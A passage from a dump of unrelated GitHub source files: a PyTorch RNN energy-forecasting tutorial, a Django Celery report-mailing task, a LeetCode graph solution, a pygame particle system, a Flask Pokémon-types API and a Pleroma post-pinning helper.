up or down. 2. when you want a column that stores the change between rows\n    df_n = df_n.iloc[n_lags:]\n    return df_n\n    \ninput_dim = 100\n\ndf_generated = generate_time_lags(df, input_dim)\ndf_generated.shape\n\n#%%\n# build date/time features from the DateTime index\ndf_features = (\n    df\n    .assign(hour = df.index.hour)\n    .assign(day = df.index.day)\n    .assign(month = df.index.month)\n    .assign(day_of_week = df.index.dayofweek)\n    .assign(week_of_year = df.index.week)\n    )\n\n\ndf_features.shape\n#%%\n'''\ndef onehot_encode_pd(df, col_name):\n    dummies = pd.get_dummies(df[col_name], prefix=col_name)\n    return pd.concat([df, dummies], axis=1).drop(columns=[col_name])\n\ndf_features = onehot_encode_pd(df_features, ['month','day','day_of_week','week_of_year'])\n\nThe code above raised ValueError: Length of 'prefix' (4) did not match the length of the columns being encoded (0),\nbut it ran after switching to the code below. Which part was wrong?\n'''\n#%%\ndef onehot_encode_pd(df, col_name):\n    dummies = pd.get_dummies(df,columns=col_name, prefix=col_name) # get_dummies: creates 0/1 columns -> quickly builds one-hot encoded columns for the given dataset\n    return dummies\n\ndf_features_onehot = onehot_encode_pd(df_features, ['month','day','day_of_week','week_of_year'])\ndf_features_onehot\n\n#%%\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import OneHotEncoder\n\ndef onehot_encode(df, onehot_columns):\n    ct = ColumnTransformer(\n        [('onehot', OneHotEncoder(drop='first'), onehot_columns)],\n        remainder='passthrough'\n    )\n    # ColumnTransformer: combines preprocessing pipelines for numeric and categorical variables; applies a different transform to each column of the input data\n    # OneHotEncoder: builds one column per category, encoding '1' (hot) if the row belongs to that category and '0' (cold) otherwise\n    return ct.fit_transform(df)\n\nonehot_columns = ['hour']\nonehot_encoded = onehot_encode(df_features, onehot_columns)\n\nonehot_encoded\n\n'''\n one-hot encoding does not fully capture the cyclical pattern of DateTime features, so another method is used\n'''\n#%%\nimport numpy as np\n\n# instead of the raw hour value, use a sine transform that preserves the periodicity\ndef generate_cyclical_features(df, col_name, period, start_num=0):\n    kwargs = {\n        f'sin_{col_name}' : lambda x: np.sin(2*np.pi*(df[col_name]-start_num)/period),\n        f'cos_{col_name}' : lambda x: np.cos(2*np.pi*(df[col_name]-start_num)/period) \n    }\n    return df.assign(**kwargs).drop(columns=[col_name])\n# assign(): method that adds new columns to a DataFrame\n# kwargs: keywords passed in the form new_column_name = content\n\ndf_cyclical_features = generate_cyclical_features(df_features_onehot, 'hour', 24, 0)\n# df_features = generate_cyclical_features(df_features, 'day_of_week', 7, 0)\n# df_features = generate_cyclical_features(df_features, 'month', 12, 1)\n# df_features = generate_cyclical_features(df_features, 'week_of_year', 52, 0)\n\ndf_cyclical_features\n\n#%%\nfrom datetime import date\nimport holidays\n\n# check whether holidays during the year affect the energy-consumption pattern\n\nus_holidays = holidays.US() # public-holiday lookup\n\n# create an extra column with a binary value indicating whether a given date is actually a holiday\ndef is_holiday(date):\n    date = date.replace(hour = 0)\n    return 1 if (date in us_holidays) else 0\n\ndef add_holiday_col(df, holidays):\n    return df.assign(is_holiday = df.index.to_series().apply(is_holiday))\n\n\ndf_holiday_features = add_holiday_col(df_cyclical_features, us_holidays)\ndf_holiday_features[df_holiday_features['is_holiday']==1]\n\n\n#%%\nfrom sklearn.model_selection import train_test_split\n\ndef feature_label_split(df, target_col):\n    y = df[[target_col]]\n    X = df.drop(columns=[target_col])\n    return X, y\n\ndef train_val_test_split(df, target_col, test_ratio):\n    val_ratio = test_ratio / (1 - test_ratio)\n    X, y = feature_label_split(df, target_col)\n    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_ratio, shuffle=False)\n    
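# (added note) val_ratio rescales the remaining data so the validation set matches the test set in size\n    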
# shuffle=False: prevents shuffling while splitting into sets\n    X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=val_ratio, shuffle=False)\n    return X_train, X_val, X_test, y_train, y_val, y_test\n\nX_train, X_val, X_test, y_train, y_val, y_test = train_val_test_split(df_holiday_features, 'value', 0.2)\n\n#%%\n#Scaling\nfrom sklearn.preprocessing import MinMaxScaler\n\nscaler = MinMaxScaler()\n#X_std = (X - X.min(axis=0)) / (X.max(axis=0) - X.min(axis=0))\n# X_scaled = X_std * (max - min) + min\nX_train_arr = scaler.fit_transform(X_train)\nX_val_arr = scaler.transform(X_val)\nX_test_arr = scaler.transform(X_test)\n\ny_train_arr = scaler.fit_transform(y_train)\ny_val_arr = scaler.transform(y_val)\ny_test_arr = scaler.transform(y_test)\n\n#%%\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler, MaxAbsScaler, RobustScaler\n\ndef get_scaler(scaler):\n    scalers = {\n        \"minmax\": MinMaxScaler,\n        \"standard\": StandardScaler,\n        \"maxabs\": MaxAbsScaler,\n        \"robust\": RobustScaler,\n    }\n    return scalers.get(scaler.lower())()\n    \nscaler = get_scaler('robust')\n\n#%%\n# load the datasets into DataLoaders\nfrom torch.utils.data import TensorDataset, DataLoader\nimport torch\n\nbatch_size = 64\n\ntrain_features = torch.Tensor(X_train_arr)\ntrain_targets = torch.Tensor(y_train_arr)\nval_features = torch.Tensor(X_val_arr)\nval_targets = torch.Tensor(y_val_arr)\ntest_features = torch.Tensor(X_test_arr)\ntest_targets = torch.Tensor(y_test_arr)\n\ntrain_features[0].shape\ntest_targets[0].shape\n\ntrain = TensorDataset(train_features, train_targets)\nval = TensorDataset(val_features, val_targets)\ntest = TensorDataset(test_features, test_targets)\n\ntrain_loader = DataLoader(train, batch_size=batch_size, shuffle=False, drop_last=True)\nval_loader = DataLoader(val, batch_size=batch_size, shuffle=False, drop_last=True)\ntest_loader = DataLoader(test, batch_size=batch_size, shuffle=False, drop_last=True)\ntest_loader_one = DataLoader(test, batch_size=1, shuffle=False, drop_last=True)\n\n#%%\nif torch.cuda.is_available():\n    device = torch.device('cuda')\nelse:\n    device = torch.device('cpu')\n\n\n#%%\n#Training the model\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nclass Optimization:\n    def __init__(self, model, loss_fn, optimizer):\n        self.model = model\n        self.loss_fn = loss_fn\n        self.optimizer = optimizer\n        self.train_losses = []\n        self.val_losses = []\n    \n    def train_step(self, x, y):\n        # Sets model to train mode\n        self.model.train()\n        hidden = self.model.initHidden()\n        # Makes predictions\n        yhat, hidden = self.model(x, hidden)\n\n        # Computes loss\n        loss = self.loss_fn(y, yhat)\n\n        # Computes gradients\n        loss.backward()\n\n        # Updates parameters and zeroes gradients\n        self.optimizer.step()\n        self.optimizer.zero_grad()\n\n        # Returns the loss\n        return loss.item()\n\n    def train(self, train_loader, val_loader, batch_size=64, n_epochs=50, n_features=1):\n        model_path = f'models/{self.model}_{datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")}'\n\n        for epoch in range(1, n_epochs + 1):\n            batch_losses = []\n            for x_batch, y_batch in train_loader:\n                x_batch = x_batch.view([batch_size, -1, n_features]).to(device)\n                # a dimension set to -1 is inferred from the other dimensions\n                \n                y_batch = y_batch.to(device)\n                loss = self.train_step(x_batch, y_batch)\n                batch_losses.append(loss)\n            training_loss = np.mean(batch_losses)\n            self.train_losses.append(training_loss)\n\n            with torch.no_grad():\n                batch_val_losses = []\n                for x_val, y_val in val_loader:\n                    x_val = x_val.view([batch_size, -1, n_features]).to(device)\n                    y_val = y_val.to(device)\n                    
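# (added note) eval() disables dropout/batch-norm updates while computing the validation loss\n                    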
self.model.eval()\n                    yhat = self.model(x_val)\n                    val_loss = self.loss_fn(y_val, yhat).item()\n                    batch_val_losses.append(val_loss)\n                validation_loss = np.mean(batch_val_losses)\n                self.val_losses.append(validation_loss)\n\n            if (epoch <= 10) | (epoch % 50 == 0):\n                print(\n                    f\"[{epoch}/{n_epochs}] Training loss: {training_loss:.4f}\\t Validation loss: {validation_loss:.4f}\"\n                )\n\n        torch.save(self.model.state_dict(), model_path) \n    \n    def evaluate(self, test_loader, batch_size=1, n_features=1):\n        with torch.no_grad():\n            predictions = []\n            values = []\n            for x_test, y_test in test_loader:\n                x_test = x_test.view([batch_size, -1, n_features]).to(device)\n                y_test = y_test.to(device)\n                self.model.eval()\n                yhat = self.model(x_test)\n                predictions.append(yhat.to(device).detach().numpy())\n                # detach(): stops gradient propagation\n                values.append(y_test.to(device).detach().numpy())\n\n        return predictions, values\n\n    def plot_losses(self):\n        plt.plot(self.train_losses, label=\"Training loss\")\n        plt.plot(self.val_losses, label=\"Validation loss\")\n        plt.legend()\n        plt.title(\"Losses\")\n        plt.show()\n        plt.close()\n    \n#%%\n# build the network\nimport torch.nn as nn\n\n'''\n# first attempt (combined = torch.cat((input, hidden), 1) error)\n# Tensors must have same number of dimensions: got 3 and 2\n\n# the RNN module is two linear layers operating on the input and hidden state, with a LogSoftmax layer after the output\nclass RNN(nn.Module):\n    def __init__(self, input_size, hidden_size, output_size):\n        super(RNN, self).__init__()\n\n        self.hidden_size = hidden_size\n\n        self.i2h = nn.Linear(input_size + hidden_size, hidden_size)\n        self.i2o = nn.Linear(input_size + hidden_size, output_size)\n        self.softmax = nn.LogSoftmax(dim=1)\n\n    def forward(self, input, hidden):\n        combined = torch.cat((input, hidden), 1)\n        hidden = self.i2h(combined)\n        output = self.i2o(combined)\n        output = self.softmax(output)\n        return output, hidden\n\n    def initHidden(self):\n        return torch.zeros(1, self.hidden_size)\n    \n'''\n#%%\n'''\n# second attempt\n#Sizes of tensors must match except in dimension 1. 
Expected size 64 but got size 3 for tensor number 1 in the list.\nclass RNN(nn.Module):\n    def __init__(self, input_size, hidden_size, output_size, num_layers):\n        super(RNN, self).__init__()\n\n        self.hidden_size = hidden_size\n        self.num_layers = num_layers\n        self.i2h = nn.Linear(input_size + hidden_size, hidden_size)\n        self.i2o = nn.Linear(input_size + hidden_size, output_size)\n        self.softmax = nn.LogSoftmax(dim=1)\n\n    def forward(self, input, hidden):\n        combined = torch.cat((input, hidden), 1)\n        hidden = self.i2h(combined)\n        output = self.i2o(combined)\n        output = self.softmax(output)\n        return output, hidden\n\n    # initHidden: creates the hidden vector for the first RNN call, when there is no state yet\n    def initHidden(self):\n        return torch.zeros(self.num_layers, 1, self.hidden_size) \n''' \n#%%\n'''\nIn the first attempt it said three dimensions were needed, so instead of using the RNN module\nI am trying to build the model by adding a layer dim, but a dimension-mismatch error appears\nin the concat function. How can I resolve it?\n\n'''\nclass RNN(nn.Module):\n    def __init__(self, input_size, hidden_size, output_size, num_layers):\n        super(RNN, self).__init__()\n        self.num_layers = num_layers\n        self.hidden_size = hidden_size\n        self.i2h = nn.Linear(input_size + hidden_size, hidden_size)\n        self.i2o = nn.Linear(input_size + hidden_size, output_size)\n        self.softmax = nn.LogSoftmax(dim=1)\n\n    def forward(self, input, hidden):\n        #input=input.view(self.num_layers,-1,self.hidden_size)->shape '[3, -1, 64]' is invalid for input of size 6784\n        combined = torch.cat((input, hidden), 1)\n        '''\n        cat: stacks tensors side by side along the chosen dimension\n        x = torch.rand(batch_size, N, K) # [M, N, K]\n        y = torch.rand(batch_size, N, K) # [M, N, K]\n        torch.cat([x,y], dim=1) #[M, N+N, K]\n        '''\n        \n        ## here the hidden cell must be fed back in repeatedly, so hidden must also be part of the return value.\n        hidden = self.i2h(combined)\n        output = self.i2o(combined)\n        output_softmax = self.softmax(output)\n        return output_softmax, hidden\n\n    # initHidden: creates the hidden vector for the first RNN call, when there is no state yet\n    def initHidden(self):\n        return torch.zeros(self.num_layers, 1, self.hidden_size) \n    \n    #output : [batch_size, sequence, hidden_size]\n    #h_0:(D∗num_layers,N(batch_size),H out(hidden_size))\n\n\na=torch.zeros(3,1,64)\na.shape #torch.Size([3, 1, 64])\nx_batch=train[0][0]\nx_batch = x_batch.view([1, -1, len(X_train.columns)])\nx_batch.shape #torch.Size([1, 1, 106])\n\n\n\n#%%\n#training\nimport torch.optim as optim\ninput_dim = len(X_train.columns)\ninput_dim #106\noutput_dim = 1\nhidden_dim = 64\nlearning_rate = 1e-3\nweight_decay = 1e-6\nn_epochs = 100\nlayer_dim = 3\nmodel = RNN(input_dim, hidden_dim, output_dim, layer_dim)\nloss_fn = nn.MSELoss(reduction=\"mean\")\n# use MSE as the loss\noptimizer = optim.Adam(model.parameters(), lr=learning_rate, weight_decay=weight_decay)\nopt = Optimization(model=model, loss_fn=loss_fn, optimizer=optimizer)\nopt.train(train_loader, val_loader, batch_size=batch_size, n_epochs=n_epochs, n_features=input_dim)\n\nopt.plot_losses()\n\npredictions, values = opt.evaluate(test_loader_one, batch_size=1, n_features=input_dim)\n\n\n#%%\n# flatten multi-dimensional tensors into 1-D vectors\ndef inverse_transform(scaler, df, columns):\n    for col in columns:\n        df[col] = scaler.inverse_transform(df[col])\n        # inverse_transform: restores data standardized by MinMaxScaler back to the original scale\n    return df\n\n\ndef format_predictions(predictions, values, df_test, scaler):\n    vals = np.concatenate(values, axis=0).ravel()\n    # np.ravel(x, order='C'): flattens the array, indexing in C-like order \n    \n    preds = np.concatenate(predictions, axis=0).ravel()\n    df_result = pd.DataFrame(data={\"value\": vals, \"prediction\": preds}, index=df_test.head(len(vals)).index)\n    df_result = 
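df_result  # no-op placeholder (added); the real assignment follows\n    # (added note) sort by the datetime index so predictions line up chronologically with X_test\n    df_result = 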
df_result.sort_index()\n    df_result = inverse_transform(scaler, df_result, [[\"value\", \"prediction\"]])\n    return df_result\n\n\ndf_result = format_predictions(predictions, values, X_test, scaler)\n\n#%%\n# compute error metrics\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, r2_score\n\ndef calculate_metrics(df):\n    return {'mae' : mean_absolute_error(df.value, df.prediction),\n            'rmse' : mean_squared_error(df.value, df.prediction) ** 0.5,\n            'r2' : r2_score(df.value, df.prediction)}\n\nresult_metrics = calculate_metrics(df_result)\n\n#%%\n# build baseline predictions - linear regression\nfrom sklearn.linear_model import LinearRegression\n\ndef build_baseline_model(df, test_ratio, target_col):\n    X, y = feature_label_split(df, target_col)\n    X_train, X_test, y_train, y_test = train_test_split(\n        X, y, test_size=test_ratio, shuffle=False\n    )\n    model = LinearRegression()\n    model.fit(X_train, y_train)\n    prediction = model.predict(X_test)\n\n    result = pd.DataFrame(y_test)\n    result[\"prediction\"] = prediction\n    result = result.sort_index()\n\n    return result\n\ndf_baseline = build_baseline_model(df_features, 0.2, 'value')\nbaseline_metrics = calculate_metrics(df_baseline)\n\n#%%\n# visualize predictions\nimport plotly.offline as pyo\n\ndef plot_predictions(df_result, df_baseline):\n    data = []\n    \n    value = go.Scatter(\n        x=df_result.index,\n        y=df_result.value,\n        mode=\"lines\",\n        name=\"values\",\n        marker=dict(),\n        text=df_result.index,\n        line=dict(color=\"rgba(0,0,0, 0.3)\"),\n    )\n    data.append(value)\n\n    baseline = go.Scatter(\n        x=df_baseline.index,\n        y=df_baseline.prediction,\n        mode=\"lines\",\n        line={\"dash\": \"dot\"},\n        name='linear regression',\n        marker=dict(),\n        text=df_baseline.index,\n        opacity=0.8,\n    )\n    data.append(baseline)\n    \n    prediction = go.Scatter(\n        x=df_result.index,\n        y=df_result.prediction,\n        mode=\"lines\",\n        line={\"dash\": \"dot\"},\n        name='predictions',\n        marker=dict(),\n        text=df_result.index,\n        opacity=0.8,\n    )\n    data.append(prediction)\n    \n    layout = dict(\n        title=\"Predictions vs Actual Values for the dataset\",\n        xaxis=dict(title=\"Time\", ticklen=5, zeroline=False),\n        yaxis=dict(title=\"Value\", ticklen=5, zeroline=False),\n    )\n\n    fig = dict(data=data, layout=layout)\n    iplot(fig)\n    \n    \n# Set notebook mode to work in offline\npyo.init_notebook_mode()\n\nplot_predictions(df_result, df_baseline)\n","repo_name":"qw-4735/tutoring","sub_path":"day7/SHS.py","file_name":"SHS.py","file_ext":"py","file_size_in_byte":19223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14925071550","text":"# -*- coding: utf-8 -*-\nfrom zipfile import ZipFile\n\nfrom celery.task import task\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\nfrom django.template.loader import render_to_string\nimport os\nfrom common.models import Burial\nfrom django.core.mail import EmailMessage\n\n@task\ndef report_2_deferred(burial_id, email):\n    b = Burial.objects.get(pk=burial_id)\n    msg = render_to_string('reports/report_2.html', {'burial': b})\n\n    html_path = os.tempnam()\n    html_path = html_path.replace('/tmp/', os.path.join(settings.MEDIA_ROOT, 'reports')) + '.html'\n\n    if not os.path.exists(os.path.dirname(html_path)):\n        os.makedirs(os.path.dirname(html_path))\n\n    f = open(html_path, 'w')\n    f.write(msg.encode('utf-8'))\n    f.close()\n\n    zip_path = html_path + '.zip'\n    zip = ZipFile(zip_path, 'w')\n    zip.write(html_path, 'report_2.html')\n    zip.close()\n\n    zip_url = zip_path.replace(settings.MEDIA_ROOT, settings.MEDIA_URL)\n    body = u'http://%s%s' % 
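('example.invalid', zip_url)  # hypothetical placeholder (added); overwritten on the next line\n    # (added note) the e-mail body is just the absolute download URL of the generated zip\n    body = u'http://%s%s' % 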
(Site.objects.get_current().domain, zip_url)\n    email = EmailMessage(subject=u'Form 2', body=body, to=[email], from_email=settings.DEFAULT_FROM_EMAIL)\n    email.send()\n\n    os.unlink(html_path)\n    # os.unlink(zip_path)\n\n    return 'ok, %s, %s' % (html_path, zip_url)","repo_name":"6jlarogap/mil","sub_path":"common/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71956013051","text":"from collections import defaultdict\nfrom heapq import heappop, heappush\nfrom typing import List\n\n\nclass Solution:\n    def maxProbability(self, n: int, edges: List[List[int]], succProb: List[float], start: int, end: int) -> float:\n        graph = defaultdict(list)\n        \n        for i in range(len(edges)):\n            edge = edges[i]\n            graph[edge[0]].append((succProb[i], edge[1]))\n            graph[edge[1]].append((succProb[i], edge[0]))\n        \n        seen = set()\n        heap = [(-1.0, start)]\n        \n        while heap:\n            prob, node = heappop(heap)\n            seen.add(node)\n            \n            if node == end:\n                return -prob\n            \n            for (edge_prob, destination) in graph[node]:\n                if destination in seen:\n                    continue\n                \n                heappush(heap, (edge_prob * prob, destination))\n        \n        return 0.0\n","repo_name":"JohnnyUrosevic/LeetCode","sub_path":"1514.py","file_name":"1514.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10724975554","text":"import pygame\nimport random\nfrom pygame.locals import *\n\nfrom locals import *\n\nclass Particle (pygame.sprite.Sprite):\n    def __init__(self, position, vect, colour, acceleration, size, life, opacity, underwater = True):\n        pygame.sprite.Sprite.__init__(self)\n\n        self.rect = pygame.Rect(position[0], position[1], size, size)\n        self.vect = vect\n        self.colour = colour\n        self.acceleration = acceleration\n        self.initial_life = life\n        self.life = life\n        self.opacity = opacity\n        self.underwater = underwater\n\n        self.image = pygame.Surface([int(size), int(size)])#, SRCALPHA, 32)\n        self.image.fill((255,0,255))\n        self.image.set_colorkey((255,0,255))\n\n        pygame.draw.ellipse(self.image, self.colour, self.image.get_rect())\n\n        if Variables.alpha:\n            self.image.set_alpha(self.life * 255 * self.opacity / self.initial_life)\n\n    def update(self):\n        self.rect.left += self.vect[0]\n        self.rect.top += self.vect[1]\n        self.vect[0] += self.acceleration[0]\n        self.vect[1] += self.acceleration[1]\n        if self.life > 0:\n            self.life -= 1\n\n        if not self.underwater and self.vect[1] > 0.0:\n            self.life = 0\n\n        if Variables.alpha:\n            self.image.set_alpha(self.life * 255 * self.opacity / self.initial_life)\n\nclass Particles (pygame.sprite.Sprite):\n    def __init__(self):\n        pygame.sprite.Sprite.__init__(self)\n\n        self.particles = []\n        self.particle_sprites = pygame.sprite.Group()\n        if Variables.alpha:\n            self.image = pygame.Surface((SCREEN_WIDTH, SCREEN_HEIGHT), SRCALPHA, 32)\n        else:\n            self.image = pygame.Surface((SCREEN_WIDTH, SCREEN_HEIGHT))\n            self.image.set_colorkey((255,0,255))\n        self.rect = self.image.get_rect()\n\n    def update(self):\n        self.image.fill((255,0,255,0))\n        \n        self.particle_sprites.draw(self.image)\n\n        for p in self.particles:\n            p.update()\n            if p.life <= 0:\n                self.particles.remove(p)\n                self.particle_sprites.remove(p)\n\n    def add_blood_particle(self, position):\n        particle = Particle(position, [random.random() * 5 - 2.5, random.random() * 5 - 2.5], [230, 30, 20], [0.0, 0.7], random.random() * 5.0 + 1.0, random.random() * 30, 1.0)\n        self.particles.append(particle)\n        self.particle_sprites.add(particle)\n\n    def add_explosion_particle(self, position):\n        particle = 
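None  # placeholder (added); the real particle is constructed on the next line\n        # (added note) explosion sparks: fixed red, randomised green channel, mild downward pull\n        particle = 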
Particle(position, [random.random() * 5 - 2.5, random.random() * 5 - 2.5], [230, 30 + random.random() * 200, 20], [0.0, 0.2], random.random() * 7.0 + 1.0, random.random() * 30, 1.0)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n\n def add_water_particle(self, position):\n particle = Particle(position, [random.random() * 5 - 2.5, -random.random() * 2.5 - 2.0], (20,60,180), (0.0, 0.3), random.random() * 5.0 + 1.0, random.random() * 30, 0.5, underwater = False)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n\n def add_debris_particle(self, position):\n particle = Particle(position, [random.random() * 5 - 2.5, random.random() * 5 - 2.5], [90, 90, 90], [0.0, 0.2], random.random() * 7.0 + 1.0, random.random() * 30, 1.0)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n\n def add_wood_particle(self, position):\n particle = Particle(position, [random.random() * 5 - 2.5, random.random() * 5 - 2.5], [148, 69, 6], [0.0, 0.2], random.random() * 7.0 + 1.0, random.random() * 30, 1.0)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n\n def add_steam_particle(self, position):\n particle = Particle(position, [-random.random() * 0.3, -random.random() * 0.1], [240, 240, 240], [-0.1, -0.00002], random.random() * 10.0 + 1.0, random.random() * 30, 0.5)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n\n def add_fire_steam_particle(self, position):\n particle = Particle(position, [-random.random() * 0.3, -random.random() * 0.1], [255, 210, 170], [-0.1, -0.00002], random.random() * 11.0 + 1.0, random.random() * 30, 0.4, False)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n\n def add_trace_particle(self, position):\n particle = Particle(position, [0.0, 0.0], [170, 170, 170], [0.0, 0.0], 6.0, 5+random.random() * 5, 0.1+random.random()*0.1, False)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n","repo_name":"AMDmi3/funnyboat","sub_path":"particles.py","file_name":"particles.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"27856738144","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/92341\n\n\nfrom collections import defaultdict\nfrom math import ceil\n\n\ndef solution(fees, records):\n total_parking_time = defaultdict(int)\n enter_car = {}\n for record in records:\n info = record.split()\n if info[2] == \"IN\":\n enter_car[info[1]] = convert_to_minute(info[0])\n else:\n parking_time = convert_to_minute(info[0]) - enter_car[info[1]]\n total_parking_time[info[1]] += parking_time\n del enter_car[info[1]]\n # 출차 기록이 없는 차들의 주차시간 계산\n end_time = convert_to_minute(\"23:59\")\n for key, item in enter_car.items():\n total_parking_time[key] += end_time - item\n\n total = []\n # 번호가 작은 순부터 꺼내기위해 key리스트를 정렬\n for key in sorted(total_parking_time.keys()):\n total_fee = fees[1] # 요금의 최소값은 기본 요금\n if total_parking_time[key] > fees[0]:\n total_fee += ceil((total_parking_time[key] - fees[0]) / fees[2]) * fees[3]\n total.append(total_fee)\n return total\n\n\ndef convert_to_minute(time):\n return int(time[:2]) * 60 + int(time[3:])\n\n\nprint(solution([180, 5000, 10, 600], [\"05:34 5961 IN\", \"06:00 0000 IN\", \"06:34 0000 OUT\", \"07:59 5961 OUT\",\n \"07:59 0148 IN\", \"18:59 0000 IN\", \"19:09 0148 OUT\", \"22:59 5961 IN\", \"23:00 5961 OUT\"]))\n","repo_name":"thecode00/Algorithm-Problem-Solve","sub_path":"Programmers/KAKAO BLIND 
RECRUITMENT/2022/주차 요금 계산/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11597544242","text":"from typing import Union, Tuple, List, TYPE_CHECKING\n\nfrom interfaces.windows import console_windows\nfrom utility import consoles\nimport utility.utilities as util\n\n\nif TYPE_CHECKING:\n from board import sprite_groups\n from machines.base_machine import Machine\n\n\nclass MachineConsole(console_windows.ConsoleWindow):\n COLOR: Union[Tuple[int, int, int, int], Tuple[int, int, int], List[int]] = (150, 150, 150, 255)\n SIZE: util.Size = util.Size(540, 500)\n\n _console: consoles.MachineConsole\n\n def __init__(\n self,\n pos: Union[Tuple[int, int], List[int]],\n sprite_group: \"sprite_groups.CameraAwareLayeredUpdates\",\n color=COLOR,\n static=True,\n title=\"MACHINE CONSOLE\",\n max_line_size=SIZE.width,\n **kwargs\n ):\n console_ = consoles.MachineConsole()\n super().__init__(pos, self.SIZE, sprite_group, console_, color=color, static=static, title=title,\n max_line_size=max_line_size, **kwargs)\n\n def set_machine(self, machine: \"Machine\"):\n self._console.set_machine(machine)\n","repo_name":"bramvanwersch/Machine_mining","sub_path":"python_code/machines/machine_terminal_interface.py","file_name":"machine_terminal_interface.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75012351293","text":"from flask.views import MethodView\nfrom flask_smorest import Blueprint, abort\nfrom sqlalchemy.exc import SQLAlchemyError, IntegrityError\nfrom schemas import TypeSchema\nfrom models import TypeModel, PokemonModel\nfrom db import db\n\nblp = Blueprint(\"types\", __name__, description=\"Operations on types\")\n\n@blp.route(\"/type\")\nclass TypeList(MethodView):\n @blp.response(200, TypeSchema(many=True))\n def get(self):\n return TypeModel.query.all()\n \n @blp.arguments(TypeSchema)\n @blp.response(201, TypeSchema)\n def post(self, type_data):\n type = TypeModel(**type_data)\n\n try:\n db.session.add(type)\n db.session.commit()\n except IntegrityError:\n abort(400, message=\"The specified type already exists in the database!\")\n except SQLAlchemyError:\n abort(500, message=\"An error occurred while inserting the type\")\n\n return type\n\n@blp.route(\"/type/\")\nclass Type(MethodView):\n @blp.response(200, TypeSchema)\n def get(self,type_id):\n type = TypeModel.query.get_or_404(type_id)\n return type\n\n@blp.route(\"/pokemon//type/\")\nclass LinkTypetoPokemon(MethodView):\n @blp.response(201, TypeSchema)\n def post(self, pokemon_id, type_id):\n pokemon = PokemonModel.query.get_or_404(pokemon_id)\n type = TypeModel.query.get_or_404(type_id)\n\n pokemon.types.append(type)\n\n try:\n db.session.add(pokemon)\n db.session.commit()\n except SQLAlchemyError:\n abort(500, message=\"An error occurred while linking the type\")\n \n return type","repo_name":"EmpressEcho/pokeapi-challenge","sub_path":"resources/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15507435099","text":"import os\nfrom json.decoder import JSONDecodeError\n\nimport json\nimport requests\n\nfrom . 
import logger\nfrom .i18n import _\n\n\ndef pin_pleroma(self, id_post):\n \"\"\"Tries to unpin previous pinned post if a file containing the ID\n of the previous post exists, then proceeds to pin the post\n with ID 'id_post'\n\n :param id_post: ID of post to pin\n :returns: ID of post pinned\n :rtype: str\n \"\"\"\n pinned_file = os.path.join(self.user_path, \"pinned_id_pleroma.txt\")\n self.unpin_pleroma(pinned_file)\n\n pin_url = f\"{self.pleroma_base_url}/api/v1/statuses/{id_post}/pin\"\n response = requests.post(pin_url, headers=self.header_pleroma)\n logger.info(_(\"Pinning post:\\t{}\").format(str(response.text)))\n try:\n pin_id = json.loads(response.text)[\"id\"]\n except KeyError:\n pin_id = None\n pass\n return pin_id\n\n\ndef unpin_pleroma(self, pinned_file):\n \"\"\"\n Unpins post with the ID stored in the file passed as parameter\n :param pinned_file: path to file containing post ID\n\n \"\"\"\n pinned_file_twitter = os.path.join(self.user_path, \"pinned_id.txt\")\n previous_pinned_post_id = None\n if os.path.isfile(pinned_file):\n with open(os.path.join(pinned_file), \"r\") as file:\n previous_pinned_post_id = file.readline().rstrip()\n if previous_pinned_post_id == \"\":\n previous_pinned_post_id = None\n\n if previous_pinned_post_id:\n unpin_url = (\n f\"{self.pleroma_base_url}/api/v1/statuses/\"\n f\"{previous_pinned_post_id}/unpin\"\n )\n response = requests.post(unpin_url, headers=self.header_pleroma)\n if not response.ok:\n response.raise_for_status()\n logger.info(_(\"Unpinning previous:\\t{}\").format(response.text))\n else:\n logger.info(\n _(\n \"File with previous pinned post ID not found or empty. \"\n \"Checking last posts for pinned post...\"\n )\n )\n _find_pinned(self, pinned_file)\n logger.warning(_(\"Pinned post not found. 
